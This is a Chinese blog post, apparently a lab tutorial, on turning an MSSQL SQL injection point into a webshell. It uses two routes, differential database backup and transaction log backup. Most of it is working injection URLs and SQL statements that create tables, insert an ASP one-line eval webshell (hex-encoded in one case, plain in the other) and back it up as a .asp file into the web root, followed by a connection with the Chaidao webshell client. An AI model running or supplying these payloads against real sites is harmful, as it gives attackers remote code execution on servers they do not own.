大哥带的mssql注入拿shell

任务二 注入点拿shell

路径的爆破

https://blog.csdn.net/edu_aqniu/article/details/78409451

0X01判断 是否为判断当前数据库用户名是否为DB_OWNER:

大哥带的mssql注入拿shell

 

 

Mssql拿shell有两种方法 win2008sever里面

0X02数据库备份拿shell

0X001 创建自己的数据库

http://www.aspx-sqli.com/index.asp?id=1;create%20database%20zhong;

 大哥带的mssql注入拿shell

 

 

0X002先进行一次完整备份:

?id=1;backup database zhong to disk = 'E:\wwwroot\asp_sqli';

 大哥带的mssql注入拿shell

 

0X003使用数据库:

http://www.aspx-sqli.com/index.asp?id=1;use%20zhong;

 大哥带的mssql注入拿shell

 

0x004创建新表:在数据库名为中的库里面创建一个新的cmd表

create table [dbo].[zhong] ([cmd] [image]);

 大哥带的mssql注入拿shell

 

0X006向cmd表中插入数据

?id=1;insert into zhong(cmd) values(0x3C25657865637574652872657175657374282276616C7565222929253E);

 大哥带的mssql注入拿shell

大哥带的mssql注入拿shell

 

 

0X007进行数据库的差异备份

?id=1;backup database zhong to disk='E:\wwwroot\asp_sqli\zhongqzi.asp' WITH DIFFERENTIAL,FORMAT;

 大哥带的mssql注入拿shell

 

然后菜刀连接

 大哥带的mssql注入拿shell

 

0X03log备份拿shell

0X001 激活为还原模式

这里要注意的是我们通过备份拿shell 要注意是需要进行数据库的

LOG备份需要先把指定的数据库激活为还原模式,所以需要执行alter database XXX set RECOVERY FUL,而差异备份不需要,所以只有这条语句的就是LOG备份

?id=1;alter database asp_test set RECOVERY FULL –

 大哥带的mssql注入拿shell

 

0X002创建新的表cmd

?id=1;create table cmd (a image) –

 大哥带的mssql注入拿shell

 

0X003备份当前库的log到网站根目录

?id=1;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhong.asp' with init –

 大哥带的mssql注入拿shell

 

0X004在cmd表的a列中插入一句话

 

insert into cmd (a) values ('<%%25Execute(request("go"))%
%25>')--

大哥带的mssql注入拿shell

 

0X005备份差异log

;backup log asp_test to disk = 'E:\wwwroot\asp_sqli\zhongqi.asp' --

大哥带的mssql注入拿shell

 

 

 

0x006 菜刀连接

大哥带的mssql注入拿shell

 ----致谢 卿哥

https://www.cnblogs.com/-qing-/p/10364190.html

带我们一点一点了解渗透

学习之路 少就是多 慢就是快

上一篇:MSSQL读取某视图中的字段类型及相关属性


下一篇:MSSQL优化之————探索MSSQL执行计划(转)